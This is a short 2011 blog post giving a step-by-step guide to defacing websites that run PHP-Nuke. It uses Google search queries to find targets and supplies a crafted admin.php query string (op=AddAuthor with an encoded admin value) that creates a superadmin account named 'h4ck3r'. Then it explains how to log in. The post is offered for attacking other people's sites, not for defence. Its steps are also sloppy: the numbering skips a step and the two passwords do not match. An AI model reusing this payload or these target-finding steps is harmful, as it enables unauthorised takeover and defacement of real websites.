Search This Blog

Wednesday, March 2, 2011

Defacing php nuke Websitses

PHP NUKE
PHP-Nuke is a web-based automated news publishing and content management system based on PHP and MySQL originally authored by Franscisco Burzi. The system is controlled using a web-based user interface. PHP-Nuke was originally a fork of the Thatware news portal system.

SOURCE: wikipedia.org


Defacing PHP NUKE website
Go to google.com and type this in the search box allinurl:.com/nuke/index.php
or
allinurl:.org/nuke/index.php

Now find a target from the search results next steps are:
1. www.targetwebsite.com/nuke/index.php

2. www.targetwebsite.com/nuke/admin.php index.php
earlier changed the above into admin.php

3. Enter the given code just after the url
?op=AddAuthor&add_ aid=h4ck3r&add_ name=God&add_ pwd=h4ck3r add_ email=h4ck3r@ gmail.com&add_ radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

If successful, the url will appear
www.targetwebsite.com/nuke/admin.php?op=mod_author

5. There you are logged in the order, enter a password before you.
id = h4ck3r
password = h4ck3rt

**not sure if they are the original authors, 'coz i saw similar pages on google, but anyways found it on, and visit for more info at:

SOURCE:www.hackingtricks.in

No comments: